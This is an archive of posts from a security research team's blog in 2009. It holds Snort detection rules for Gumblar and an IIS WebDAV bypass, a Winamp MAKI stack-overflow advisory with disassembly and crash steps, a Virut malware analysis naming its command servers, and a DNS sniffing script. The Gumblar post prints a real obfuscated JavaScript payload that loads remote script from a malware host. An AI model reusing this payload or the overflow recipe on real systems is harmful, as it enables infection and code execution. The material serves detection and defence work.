Thursday, May 28, 2009

DoJoSec Meeting - June 4th

The DoJoSec lineup for the June meeting has been announced and our own Alain Zidouemba will be giving a presentation entitled "What to do with the Unknown".

Alain will be demonstrating what options are available to the administrator when an unknown piece of malware is encountered.

To register for DoJoSec please visit http://www.dojosec.com/, sign up and be there on Thursday. Other members of the VRT will be on hand to answer any questions you may have on Snort, Snort rules, Exploitation and General Mayhem.

Friday, May 22, 2009

Gumblar and More On Javascript Obfuscation

A couple of months ago I put together a post on detection of obfuscated JavaScript. Not surprisingly, that topic has popped back up on the VRT radar screen this week, this time in the context of something much more interesting - Gumblar, the new worm that everyone is talking about.

For anyone who hasn't heard, Gumblar is a piece of malware named for the web site that was originally hosting it - hxxp://gumblar.cn (WARNING! Live Malware site!). It spreads via two primary mechanisms: stealing FTP credentials from compromised systems and using them to infect web sites, and delivering a malicious JavaScript payload via those compromised sites that hits client systems with a combination of Acrobat and Flash exploits. Once inside a user's system, Gumblar redirects Google search results to malware-laden pages, dropping all sorts of nastiness on victims' systems.

Generally speaking, Gumblar looks a lot like any other piece of obfuscated JavaScript malware:

(function(ljk8K){var q0UFt='%';var ikN7=('va_72_20a_3d_22ScriptEngi_6ee_22_2cb_3d_22Version(_29+_22_2cj_3d_22_22_2cu_3d_6e
avigator_2euserAge_6et_3bif((u_2eind_65xOf(_22C_68_72ome_22)_3c0_29_26_26_28_75_2ei_6edex_4f_
66(_22Win_22)_3e0)_26_26(u_2e_69nde_78Of(_22N_54_206_22)_3c_30)_26_26(doc_75_6de_6et_2ecoo_6b_
69e_2ein_64exOf(_22miek_3d1_22)_3c_30_29_26_26_28ty_70eof_28zrvzts_29_21_3dtypeof(_22A_22_29))_
7bzrv_7ats_3d_22_41_22_3beval(_22_69_66(window_2e_22+a+_22)_6a_3d_6a+_22_2ba_2b_22_4dajo_72_22+
b+a+_22M_69nor_22_2b_62+a+_22_42uild_22+b_2b_22_6a_3b_22)_3b_64_6f_63um_65nt_2ewr_69te(_22_3c_73
cr_69pt_20src_3d_2f_2fma_22_2b_22_72_74_75_7a_2ecn_2fvi_64_2f_3fid_3d_22+j+_22_3e_3c_5c_2fs_63
ript_3e_22)_3b_7d').replace(ljk8K,q0UFt);var pbEO=unescape(ikN7);eval(pbEO)})(/\_/g);

Note: line breaks inserted above for readability - there are none in the actual exploit

What makes it stand out in the crowd of malicious JavaScript is its prevalence: a week ago Sophos declared it the fastest-growing threat on the Internet, and it has only continued to spread since.

Unfortunately, the rule discussed in my last blog post on obfuscated JavaScript - GID 1, SID 15363 - does not fire on Gumblar. That rule's search for "eval(" and "unescape(" within 15 bytes of each other succeeds on many variants of Gumblar, and its underlying logic of looking for a large block of data inside a call to unescape() is still valid. The problem is that the JavaScript payload Gumblar obfuscates contains items like indexOf(), document.write(), etc. that are not completely escaped out, and the closing parentheses from those calls cause the rule to fail, since it requires no close parenthesis within 250 bytes of the start of the unescape() call. It's not that the rule itself is useless - there's plenty of malware out there that it still catches - it's just that Gumblar is smart (or lucky) enough to take advantage of a known evasion case.

Given the reality that tracking nested parentheses isn't happening in Snort - or any IDS, for that matter - any time soon, we can't directly address that evasion case. With that in mind, the VRT decided to try to look for other characteristics inside of Gumblar's JavaScript that we could use to detect it. After poring through hundreds of samples of Gumblar's malicious HTML, it quickly became clear that anything common to the obfuscated payload itself would be of very limited use, since the obfuscation method changes in subtle ways between different infected web sites, and sometimes even between different pages on the same infected site.

There are, however, several characteristics that are common to all of the different JavaScript payloads:

  • They're all composed of very long lines (500+ bytes) that have a function declaration within a few bytes of the start of the line

  • They all contain either "eval(unescape(..." or "unescape(...)...eval()"

  • They all use the replace() function to aid the de-obfuscation process


This combination of items makes for a specific enough set of criteria that false positives should be minimal - as I stated in my last post, legit JavaScript code has little to no reason to obfuscate itself like this - while still remaining generic enough to catch all the variants of Gumblar we've tested (and, quite likely, other pieces of malware that use similar logic). In fact, we can likely even leave out the call to replace() from our rule and still be in good shape - since it's the most easily removed portion of the equation if you want your nasty JavaScript to go undetected, and the other conditions are so rarely together in legitimate situations anyway.

Putting this all together, you come up with the following pair of rules:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT obfuscated javascript function eval unescape long line"; flow:established,to_client; content:"function|28|"; nocase; content:!"|0A|"; within:500; content:"eval|28|"; nocase; content:"unescape|28|"; nocase; pcre:"/^.{0,5}function\x28[^\n]+eval\x28[^\n]{0,15}unescape\x28/smi"; metadata: service http; reference:url,www.cs.ucsb.edu/~marco/blog/2008/10/dom-based-obfuscation-in-malicious-javascript.html; reference:url,blog.scansafe.com/display/Search?searchQuery=gumblar; classtype:misc-attack;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT obfuscated javascript function unescape eval long line"; flow:established,to_client; content:"function|28|"; nocase; content:!"|0A|"; within:500; content:"eval|28|"; nocase; content:"unescape|28|"; nocase; pcre:"/^.{0,5}function\x28[^\n]+unescape\x28[^\n]{0,15}eval\x28/smi"; metadata: service http; reference:url,www.cs.ucsb.edu/~marco/blog/2008/10/dom-based-obfuscation-in-malicious-javascript.html; reference:url,blog.scansafe.com/display/Search?searchQuery=gumblar; classtype:misc-attack;)
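To make the two rules' logic concrete, and to show exactly why the older SID 15363 logic misses this style of obfuscation, here is an added Python example (not code from the post or from the VRT) that ports the rules' conditions to a per-line check and runs them against constructed samples. The samples, the BLOB that stands in for an obfuscated payload, and the helper names are all assumptions for illustration; the BLOB follows the replace()-then-unescape() style the post describes, with "_" in place of "%" and literal parentheses left in.

```python
import re
from urllib.parse import unquote

# Constructed samples (not taken from the post's live sample). BLOB mimics the
# obfuscation style: "_" stands in for "%", so replace() + unescape() yields
# plain JavaScript, and the blob keeps literal "(" and ")" characters, which is
# the evasion case the post describes.
BLOB = b"_64oc_75ment_2ewri_74e(_22x_22)_3b" * 20          # ~680 bytes
SAMPLE_OBFUSCATED = (b"(function(k){eval(unescape('" + BLOB
                     + b"'.replace(k,'%')))})(/\\_/g);")
SAMPLE_BENIGN = (b"!function(e){var t=e.document;" + b"t.write('x');" * 40
                 + b"}(window);")                            # long minified line, no eval/unescape
SAMPLE_SHORT = b"(function(){eval(unescape('%41'))})();"      # eval/unescape but far below 500 bytes

MIN_LINE_LEN = 500
# The pcre bodies of the two rules, applied to a single line (no trailing newline).
FUNC_EVAL_UNESCAPE = re.compile(
    rb"^.{0,5}function\x28[^\n]+eval\x28[^\n]{0,15}unescape\x28", re.I | re.S)
FUNC_UNESCAPE_EVAL = re.compile(
    rb"^.{0,5}function\x28[^\n]+unescape\x28[^\n]{0,15}eval\x28", re.I | re.S)


def matches_new_rules(line: bytes) -> bool:
    """Port of the pair of rules: 'function(' near the start of a line that runs
    at least 500 bytes without a newline, plus 'eval(' and 'unescape(' within
    15 bytes of each other in either order."""
    m = re.search(rb"function\x28", line, re.I)
    if m is None:
        return False
    # content:!"|0A|"; within:500 -> no newline in the 500 bytes after "function(".
    # The post's first characteristic (500+ byte lines) is enforced explicitly here.
    tail = line[m.end():m.end() + MIN_LINE_LEN]
    if len(tail) < MIN_LINE_LEN or b"\n" in tail:
        return False
    return bool(FUNC_EVAL_UNESCAPE.search(line) or FUNC_UNESCAPE_EVAL.search(line))


def matches_old_rule_logic(line: bytes) -> bool:
    """The logic of GID 1, SID 15363 as the post describes it: eval( and
    unescape( within 15 bytes of each other, and no ')' within 250 bytes of the
    start of the unescape( call. A literal ')' inside the blob defeats it."""
    pair = re.search(
        rb"eval\x28[^\n]{0,15}unescape\x28|unescape\x28[^\n]{0,15}eval\x28", line, re.I)
    if pair is None:
        return False
    u = re.search(rb"unescape\x28", line, re.I)
    return b")" not in line[u.start():u.start() + 250]


def decode_replace_unescape(blob: bytes, marker: bytes = b"_") -> str:
    """Undo the replace(marker, '%') + unescape() step to see the real payload."""
    return unquote(blob.replace(marker, b"%").decode("ascii"))


if __name__ == "__main__":
    for name, sample in [("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN),
                         ("short", SAMPLE_SHORT)]:
        print(f"{name:10s} new rules: {matches_new_rules(sample)!s:5s} "
              f"old rule: {matches_old_rule_logic(sample)}")
    print("decoded payload:", decode_replace_unescape(BLOB)[:40], "...")
```

Run against the three samples, only the obfuscated line trips the new logic, the long benign minified line and the short eval/unescape snippet do not, and the old 250-bytes-without-a-close-paren check misses the obfuscated line for exactly the reason given above. The decode helper is the analyst's view of the same mechanism: replace the marker, percent-decode, and the payload the sample would eval() is readable.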

We're still testing this out here in VRT-land, to make sure that it doesn't fire on some common JavaScript case that we haven't thought of. In the meantime, though, we wanted to make this available for anyone who's concerned about Gumblar. Use at your own risk - and please, if you use it, send your feedback to research at sourcefire dot com.

Note: These rules are covered by the Sourcefire VRT Certified Rules License agreement available here: http://www.snort.org/about_snort/licenses/vrt_license.html

Wednesday, May 20, 2009

Winamp MAKI Parsing Vulnerability Details

About two months ago, we found a vulnerability in the Winamp 5.55 MAKI script parsing module. We reported our findings to AOL. AOL then released Winamp version 5.552 with the fix. Here are the details:

Winamp MAKI Parsing Integer Overflow Vulnerability

Vendor:
AOL/Nullsoft

Severity:
High

Systems Affected:
Winamp 5.55 and prior versions that support Modern Skins.

Overview:
A vulnerability exists in Winamp. The vulnerability is due to an incorrect type cast while parsing a .maki file (a compiled script file), causing a buffer overflow. An attacker could provide a user with a modern skin (via a webpage download for example) that uses the maki script to execute arbitrary code within the context of the current user.

Technical Details:
Winamp’s modern skins scripting engine reads strings from the .maki file. The format of these strings is composed as follows (multi-byte values are in little endian byte order):

Offset   Size   Description
-------  -----  --------------------------------------
0x0000   4      Unknown (it seems to be a type code)
0x0004   2      Length (Y)
0x0006   Y      Function name

When gen_ff.dll parses a .maki file, it reads two bytes and does a sign extension, which results in a stack buffer overflow.

The following shows the local buffer size (0x10008):

.text:12094DAB var_10144= byte ptr -10144h
.text:12094DAB MultiByteStr= byte ptr -13ch

If a string size is greater than or equal to 0x8000, edi will be 0xFFFFhhhh (where, 0xhhhh is the two byte input)

.text:12094F62 loc_12094F62:
.text:12094F62 mov ax, [ebx]
.text:12094F65 movsx edi, ax ; sign extension
.text:12094F68 inc ebx
.text:12094F69 push edi ; Size
.text:12094F6A inc ebx
.text:12094F6B lea eax, [ebp+MultiByteStr]
.text:12094F71 push ebx ; Src
.text:12094F72 push eax ; Dst, buffer is located in the stack
.text:12094F73 call memmove

.text:120951E5 loc_120951E5:
.text:120951E5 mov edi, [ebx]
.text:120951E7 add ebx, 4
.text:120951EA mov ax, [ebx]
.text:120951ED movsx esi, ax ; sign extension
.text:120951F0 inc ebx
.text:120951F1 push esi ; Size
.text:120951F2 inc ebx
.text:120951F3 lea eax, [ebp+var_10144]
.text:120951F9 push ebx ; Src
.text:120951FA push eax ; Dst, buffer is located in the stack
.text:120951FB call memmove
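The following is an added Python example (not code from the advisory or from Winamp) that models the string record layout from the table above and contrasts the sign-extending read the disassembly shows with a bounds-checked parse. The record bytes are constructed for illustration, the 0x10008 buffer size is the one given above, and the function names are assumptions.

```python
import struct

# String record layout from the advisory (little endian): 4-byte type code,
# 2-byte length Y, then Y bytes of name.
HEADER = struct.Struct("<IH")
LOCAL_BUFFER_SIZE = 0x10008   # stack buffer size shown in the advisory (var_10144)

# Constructed records, not bytes from a real skin. The benign one uses the
# 0x0011 length the advisory observed in the Bento skin.
BENIGN_RECORD = b"\x01\x00\x00\x00\x11\x00" + b"A" * 0x11
CRAFTED_RECORD = b"\x01\x00\x00\x00\xff\xff" + b"A" * 0x20   # length says 0xFFFF, data is short


def size_pushed_by_gen_ff(record: bytes) -> int:
    """Reproduce the vulnerable read: 'movsx edi, ax' sign-extends the 2-byte
    length, so any value >= 0x8000 becomes 0xFFFFhhhh when pushed as the
    memmove size."""
    signed_len = struct.unpack_from("<h", record, 4)[0]
    return signed_len & 0xFFFFFFFF


def parse_string_record(record: bytes, offset: int = 0):
    """Bounds-checked parser: read the length unsigned, then check it against
    both the destination buffer and the bytes actually present."""
    if len(record) - offset < HEADER.size:
        raise ValueError("truncated header")
    type_code, length = HEADER.unpack_from(record, offset)
    if length > LOCAL_BUFFER_SIZE:
        raise ValueError(f"length {length:#x} exceeds destination buffer")
    end = offset + HEADER.size + length
    if end > len(record):
        raise ValueError(f"length {length:#x} runs past end of data")
    return type_code, record[offset + HEADER.size:end], end


def record_is_well_formed(record: bytes) -> bool:
    try:
        parse_string_record(record)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for label, rec in (("benign", BENIGN_RECORD), ("crafted", CRAFTED_RECORD)):
        print(f"{label}: memmove size as gen_ff.dll computes it = "
              f"{size_pushed_by_gen_ff(rec):#x}, well formed = {record_is_well_formed(rec)}")
```

The unsigned read ("<H") on its own is not enough: a length that fits in 16 bits can still exceed a smaller destination buffer or the data that remains in the file, which is why the parser checks both before copying.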

Reproduction:
I used the Bento skin’s maki file. The highlighted text in the following figure shows the two byte size (value is 0x0011) and the following 17 characters. I changed the size to 0xFFFF and inserted a lot of 0x41 (obviously more than 0xFFFF). Then BANG! EIP was overwritten with 0x41414141.



Resolution:
Sourcefire released detection for this issue (gid:3 sid:15433) on 2009-03-31
Vendor released Winamp 5.552 on 2009-04-11

Update:
This issue now has a Bugtraq entry, available here: http://www.securityfocus.com/bid/35052

Rules to detect IIS 6.0 WebDAV exploit

Thanks for the inquiries. Here are rules that detect attacks against IIS 6.0 with WebDAV enabled.

(see yesterday's post for details)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV COPY remote authentication bypass attempt"; flow:to_server,established; content:"COPY"; http_method; pcre:"/^COPY\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:1; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPFIND remote authentication bypass attempt"; flow:to_server,established; content:"PROPFIND"; http_method; pcre:"/^PROPFIND\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:2; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPPATCH remote authentication bypass attempt"; flow:to_server,established; content:"PROPPATCH"; http_method; pcre:"/^PROPPATCH\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:3; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MKCOL remote authentication bypass attempt"; flow:to_server,established; content:"MKCOL"; http_method; pcre:"/^MKCOL\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:4; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MOVE remote authentication bypass attempt"; flow:to_server,established; content:"MOVE"; http_method; pcre:"/^MOVE\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:5; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV LOCK remote authentication bypass attempt"; flow:to_server,established; content:"LOCK"; http_method; pcre:"/^LOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:6; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV UNLOCK remote authentication bypass attempt"; flow:to_server,established; content:"UNLOCK"; http_method; pcre:"/^UNLOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:7; rev:1;)


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV DAV remote authentication bypass attempt"; flow:to_server,established; content:"DAV"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:8; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Destination remote authentication bypass attempt"; flow:to_server,established; content:"Destination"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:9; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Depth remote authentication bypass attempt"; flow:to_server,established; content:"Depth"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:10; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV If remote authentication bypass attempt"; flow:to_server,established; content:"If"; http_header; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:11; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Lock-Token remote authentication bypass attempt"; flow:to_server,established; content:"Lock-Token"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:12; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Overwrite remote authentication bypass attempt"; flow:to_server,established; content:"Overwrite"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:13; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Timeout remote authentication bypass attempt"; flow:to_server,established; content:"Timeout"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:14; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Translate remote authentication bypass attempt"; flow:to_server,established; content:"Translate"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:15; rev:1;)
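For replaying the same conditions against captured requests or log extracts, here is an added Python example (not code from the post or from the VRT) that mirrors the fifteen rules: the shared pcre on the request line, the seven method-based rules and the eight header-based ones. The requests it checks are constructed for illustration, and the function and constant names are assumptions.

```python
import re

# Method- and header-based conditions from the rules above, one per rule.
WEBDAV_METHODS = ("COPY", "PROPFIND", "PROPPATCH", "MKCOL", "MOVE", "LOCK", "UNLOCK")
WEBDAV_HEADERS = ("DAV", "Destination", "Depth", "If", "Lock-Token",
                  "Overwrite", "Timeout", "Translate")
# Shared pcre body: a request line carrying a percent-encoded octet >= 0x80.
HIGH_BYTE_PCT = re.compile(rb"^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])", re.I | re.S)


def check_request(raw: bytes):
    """Return the rule conditions a raw HTTP request satisfies, as a list of
    strings such as 'method PROPFIND' or 'header Depth' (empty if none)."""
    request_line, _, rest = raw.partition(b"\r\n")
    if not HIGH_BYTE_PCT.search(request_line):
        return []                      # every rule needs the encoded high byte
    method = request_line.split(b" ", 1)[0].decode("ascii", "replace").upper()
    header_names = set()
    for hl in rest.split(b"\r\n"):
        if not hl:
            break                      # blank line ends the headers
        name = hl.partition(b":")[0].strip().decode("ascii", "replace")
        # HTTP header names are case-insensitive; note the "If" rule above has
        # no nocase, so it is stricter than this check.
        header_names.add(name.lower())
    hits = []
    if method in WEBDAV_METHODS:
        hits.append(f"method {method}")
    hits.extend(f"header {h}" for h in WEBDAV_HEADERS if h.lower() in header_names)
    return hits


# Constructed requests (%C3%A9 is just UTF-8 for 'é'; any %80-%FF octet qualifies).
REQ_PROPFIND = (b"PROPFIND /private/%C3%A9 HTTP/1.1\r\nHost: www.example.com\r\n"
                b"Depth: 1\r\n\r\n")
REQ_GET = b"GET /private/%C3%A9.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
REQ_PLAIN = b"PROPFIND /private/ HTTP/1.1\r\nHost: www.example.com\r\nDepth: 1\r\n\r\n"
REQ_SPACE = b"MOVE /a%20b HTTP/1.1\r\nDestination: /c\r\n\r\n"

if __name__ == "__main__":
    for req in (REQ_PROPFIND, REQ_GET, REQ_PLAIN, REQ_SPACE):
        print(req.split(b"\r\n", 1)[0].decode(), "->", check_request(req) or "no match")
```

The two negative cases are the ones worth keeping in mind when tuning: a plain GET with the same encoded octet matches none of the rules because no WebDAV method or header is present, and %20 in a MOVE request does not match because the pcre only accepts a leading hex digit of 8 through F.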

Note: These rules are covered by the Sourcefire VRT Certified Rules License agreement available here: http://www.snort.org/about_snort/licenses/vrt_license.html

Also, some browsers do not wrap the rules properly but highlight, copy and paste works just fine.

Tuesday, May 19, 2009

Snort protection against IIS 6.0 WebDAV exploit

Microsoft Security Advisory (971491) published on May 18, 2009 concerns a vulnerability in IIS that may allow unauthorized access to an area of a website that would normally be protected.

An attack against IIS 6.0 with WebDAV enabled was published at milw0rm (http://www.milw0rm.com/exploits/8704).

Snort already has coverage for this vulnerability by using the http_inspect preprocessor. In order to detect attacks, make sure that ascii yes or utf_8 yes is added to your configuration.

For example (use utf_8 yes in place of ascii yes if that is the decoding you need; a trailing comment after the line-continuation backslash would break the configuration, so the choice is noted here rather than inline):

preprocessor http_inspect_server: server default \
    ports { 80 8080 } \
    server_flow_depth 0 \
    ascii yes \
    double_decode yes \
    non_rfc_char { 0x00 } \
    chunk_length 500000 \
    non_strict \
    oversize_dir_length 300


It is also possible to detect this activity using rules; if there is sufficient interest, let us know and we'll post them here.

Wednesday, May 13, 2009

IP Blacklisting in Snort

Our Supreme Overlord and Benevolent Dictator, Marty Roesch, had a little free time on his hands over the weekend and spent some of it writing a new preprocessor for Snort 2.8.4.1 that implements IP blacklisting. This should help a great deal with performance for those folks who like to use Snort as a pseudo firewall.

Currently, the patch works and Snort successfully builds on OS X, Fedora and Ubuntu. It may work out of the box on other systems, but these are the ones that have been tested so far. There are some requirements, and you really need to read the README.iplist that comes in the tarball.

Remember, this code is EXPERIMENTAL and your mileage may vary when using it.

Here's a link to the patch: http://www.snort.org/users/roesch/code/iplist.patch.tgz

Here's a link to Marty's blogpost: http://securitysauce.blogspot.com/2009/05/ip-blacklisting-for-snort-2841.html

Have fun!

EDIT: I also got the patch to work on FreeBSD.

Tuesday, May 12, 2009

Microsoft Tuesday Coverage for May MS09-017

Microsoft Security Advisory MS09-017:
Microsoft PowerPoint contains several programming errors that may allow a remote attacker to execute code on a vulnerable system via a specially crafted PowerPoint file.

Rules to detect attacks targeting these vulnerabilities are included in this release and are identified with GID 3, SIDs 15498 through 15506.

Additionally, a previously released rule identified with GID 3, SID 15454 will also detect attacks targeting these vulnerabilities.

Here's the link: http://www.snort.org/vrt/advisories/vrt-rules-2009-05-12.html

Exploit Development Class

Want to impress your friends, colleagues, girls, boys, employer, future employer? Want to become more attractive to the opposite sex? Want to make your past employer and/or ex-(girlfriend|boyfriend|spouse) jealous? Then you need to get dangerous and become awesome.

We're running a fundamentals of exploit development class here in Columbia, MD in June. Three days, 23rd to the 25th to be exact. It will take you from knowing absolutely nothing to writing your own exploits in a very short time. For more details and to sign up, check out these corporate links:

http://www.sourcefire.com/services/education/courses/

http://www.sourcefire.com/services/education/schedule/

We've run the class before and it's been extremely well received and very successful, so if you want to get in on the exploit development action, sign up and we'll see you there. One more thing: this is a Sourcefire VRT run class, so you'll be getting the information straight from the horse's mouth (so to speak), no fluff, no cheese, straight up exploit knowledge. (We might even drop some 0day, we did last time)

Monday, May 11, 2009

Estimating Time

One of the developers here at Sourcefire, Andrew Williams, has written what we think is an interesting piece on Estimating Time for project planning. Take a look at it here: http://www.baltdad.com/2009/05/estimation/

Friday, May 8, 2009

Snort and Neural Networks

Jacson Rodrigues Correia da Silva just finished his Bachelor's degree in computer science. As part of his final project, he came up with an implementation that allows you to use Snort with JavaNNS (see http://www.cis.cau.edu/675/javasnns.html). This means you could use Snort in an artificial neural network. Pretty cool, no?

You can find his work here: http://jacsonrcsilva.googlepages.com/snort-rna (it's in Portuguese, but you can figure it out right?)

Jacson is now working on his Master's degree; hopefully he'll have more cool stuff to show off when he's done with that too.

DoJoSec and dnssnarf

One of our IT guys (total security geek Christopher McBee) found some interesting information from last night's DoJoSec meeting. Here's what he has to say:

During Sean Wilkerson's talk at last night's DojoSec meeting (http://www.dojosec.com), Sean discussed some simple open source monitoring tools included in the dsniff suite, including urlsnarf, mailsnarf, etc., used for validating assumptions about your security infrastructure and products. One of the questions during the talk was for a tool similar to these for DNS snarfing. Twenty minutes and 6 lines of Python later. The output is in BIND query log format so you should be able to throw it into your favorite query log parsing tool.

import sys
from scapy.all import sniff, IP, UDP, DNS, DNSQR

def dns_callback(pkt):
    # Only outbound DNS queries (dport 53) that carry a question record
    if DNS in pkt and UDP in pkt and pkt[UDP].dport == 53 and DNSQR in pkt:
        qname = pkt[DNSQR].qname
        if isinstance(qname, bytes):          # recent Scapy returns qname as bytes
            qname = qname.decode("ascii", "replace")
        # BIND query log style: client <ip>#<port>: query: <name> <class> <type> +
        print(pkt.sprintf("client %IP.src%#%UDP.sport%: query: ")
              + qname + " " + pkt[DNSQR].sprintf("%qclass% %qtype% +"))

iface = sys.argv[1] if len(sys.argv) > 1 else "eth0"
sniff(iface=iface, prn=dns_callback, filter="udp and port 53", store=0)

Tuesday, May 5, 2009

Rule release for today - May 5th 2009

Adobe Reader Code Execution (CVE-2009-1492):
The JavaScript API in Adobe Reader may allow a remote attacker to execute code on an affected system. The problem occurs when specially crafted JavaScript uses the getAnnots method in a PDF document.

A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15493.

Adobe Reader Buffer Overflow (CVE-2009-1493):
The JavaScript API in Adobe Reader may allow a remote attacker to execute code on an affected system. The problem occurs when specially crafted JavaScript uses the customDictionaryOpen method in a PDF document.

A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15492.

Additionally as a result of ongoing research, the Sourcefire VRT has added multiple rules to the exploit, specific-threats, backdoor, multimedia and chat rule sets to provide coverage for emerging threats from these technologies.

Details available here

Virut Analysis and Snort Rule

Virut (from virus + trojan) is a family of malware that has been around since about 2006. Unfortunately for us, it is still around 3 years later, with new variants being released on a regular basis. We came across a recent Virut sample (MD5:e68c4b9428f41036b1cf890d93bdf390) and took a closer look at it:

Immediately after the file is executed, it establishes an encrypted connection to irc.zief.pl:65520 (should it fail, the backup server is proxim.ircgalaxy.pl) to contact its command and control server. Virut then downloads several executable files from adx2.2288.org disguised as "non files" (per the file extensions):

  • adx.gif, a Trojan downloader
  • 8.txt, a password stealer. An analysis of 8.txt shows the following strings embedded in it:


Pic.1: Strings embedded in executable "8.txt"

The network traffic confirms that "8.txt" is a password stealing Trojan:

Pic.2: Network traffic showing password-stealing Trojan in action

Additional malware is downloaded from put.ghura.pl:

  • out.exe
  • adrtv.exe
  • ad2.exe

Note that the files downloaded, including their names, have the potential of being completely different every time, because Virut gets commands on what to do at runtime through its connection to the C&C server.

Virut is also a classic "virus" in the sense that it spreads from file to file by appending malicious code to clean files, making them some 20 kb larger than before. In infected files, a jump (JMP) instruction is inserted to point to the end of the original file. Picture 3 shows the virus entry point.

Pic.3: Virut entry point


This variant of Virut is also an entry-point obscuring virus. Different infected files show that the virus' entry point is always at different offsets relative to the entry point of the infected files. Virut patches the code of the executables so that the virus is not always invoked when the files are run, but is called randomly.

Additionally, Virut is highly polymorphic. Pictures 4 and 5 show the file-appending virus code for 2 infected executables. The two sets of instructions do not match at all because Virut uses garbage instructions and a different decryptor for each file it infects, making analysis more difficult.

Pic.4: Virut code appended to an executable


Pic.5: Virut code appended to another executable

According to VirusBulletin (www.virusbtn.com), the malware family Virut was the 5th most prevalent in March 2009. Virut has used the same domain name for the server it contacts when it is initially run. Rules to detect Virut attempting to contact its command and control server will be released in the near future. I will then update this blog post with the GIDs and SIDs.